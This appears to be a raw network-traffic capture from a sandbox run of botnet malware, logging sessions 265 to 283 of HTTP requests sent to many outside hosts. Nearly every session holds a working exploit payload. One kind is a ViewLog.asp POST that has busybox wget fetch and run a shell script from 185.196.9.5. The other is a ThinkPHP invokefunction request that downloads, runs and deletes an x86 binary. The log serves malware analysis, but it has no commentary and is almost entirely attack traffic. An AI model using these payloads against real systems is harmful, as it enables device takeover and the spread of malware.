Feb 25, 2024 19:03:08.619210958 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:08.833937883 CET	518	IN	HTTP/1.1 404 Not Found Referrer-Policy: no-referrer Server: thttpd Content-Type: text/html; charset=utf-8 Date: Sun, 25 Feb 2024 18:03:08 GMT Last-Modified: Sun, 25 Feb 2024 18:03:08 GMT Accept-Ranges: bytes Connection: close Cache-Control: no-cache,no-store Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 68 31 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 68 65 69 67 68 74 3a 20 31 35 30 70 78 22 3e 0a 09 09 3c 73 70 61 6e 3e 0a 09 09 09 45 72 72 6f 72 20 34 30 34 2c 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a 09 09 3c 2f 73 70 61 6e 3e 0a 09 3c 2f 68 31 3e 0a 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 3c 2f 61 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <html><head></head><body><h1 style="text-align: center; height: 150px"><span>Error 404, Page not found</span></h1><div style="text-align: center;"><a href="/">Home</a></div></body></html><HR></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
265	192.168.2.15	46032	85.74.204.45	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:08.620013952 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
266	192.168.2.15	44304	94.120.246.155	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:08.626091003 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
267	192.168.2.15	55276	95.79.106.197	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:08.639431953 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:08.857158899 CET	407	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:08 GMT Server: Apache/2.4.54 (Win64) Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
268	192.168.2.15	48256	31.200.3.197	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:08.846787930 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
269	192.168.2.15	51070	95.100.64.108	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:08.884702921 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:09.128740072 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:03:09 GMT Date: Sun, 25 Feb 2024 18:03:09 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 34 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 38 38 38 34 31 38 39 26 23 34 36 3b 36 38 34 61 64 39 30 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.b47a7b5c.1708884189.684ad904</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
270	192.168.2.15	46142	94.120.8.174	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:09.051050901 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
271	192.168.2.15	55078	112.184.176.83	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:09.151421070 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
272	192.168.2.15	34760	85.122.213.171	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:09.744638920 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
273	192.168.2.15	51440	112.140.185.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:09.992140055 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:11.166465044 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co

Session ID	Source IP	Source Port	Destination IP	Destination Port
274	192.168.2.15	34586	88.84.135.3	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:10.163520098 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:10.333517075 CET	495	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
275	192.168.2.15	52500	88.99.85.206	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:10.178365946 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:10.362804890 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:10 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
276	192.168.2.15	57236	95.179.198.96	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:11.066246033 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:11.231384993 CET	137	IN	HTTP/1.1 502 Bad Gateway Date: Sun, 25 Feb 2024 18:03:11 GMT Content-Length: 0 Content-Type: text/plain; charset=utf-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
277	192.168.2.15	60540	94.132.182.164	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:11.108084917 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:11.320175886 CET	548	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:09 GMT Server: X-Frame-Options: SAMEORIGIN Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob: Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
278	192.168.2.15	34606	85.229.16.49	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:11.321372032 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:11.535635948 CET	561	IN	HTTP/1.1 404 Not Found Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type Content-Type: text/html Content-Length: 345 Date: Sun, 25 Feb 2024 18:03:10 GMT Server: WebServer Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
279	192.168.2.15	36850	94.121.64.65	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:11.338095903 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
280	192.168.2.15	42350	95.165.106.162	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:11.345613003 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:11.584806919 CET	363	IN	HTTP/1.1 403 Forbidden Server: Web server Date: Sun, 25 Feb 2024 18:02:56 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive X-Detail: 0x1210, insufficient security level Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
281	192.168.2.15	48686	94.120.31.199	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:11.461277008 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
282	192.168.2.15	48528	62.29.124.157	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:11.461357117 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
283	192.168.2.15	60882	95.85.113.35	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:11.517395020 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:11.816219091 CET	200	IN	HTTP/1.1 404 Not Found Content-Type: text/plain Vary: Origin X-Krakend-Completed: false Date: Sun, 25 Feb 2024 18:03:11 GMT Content-Length: 18 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
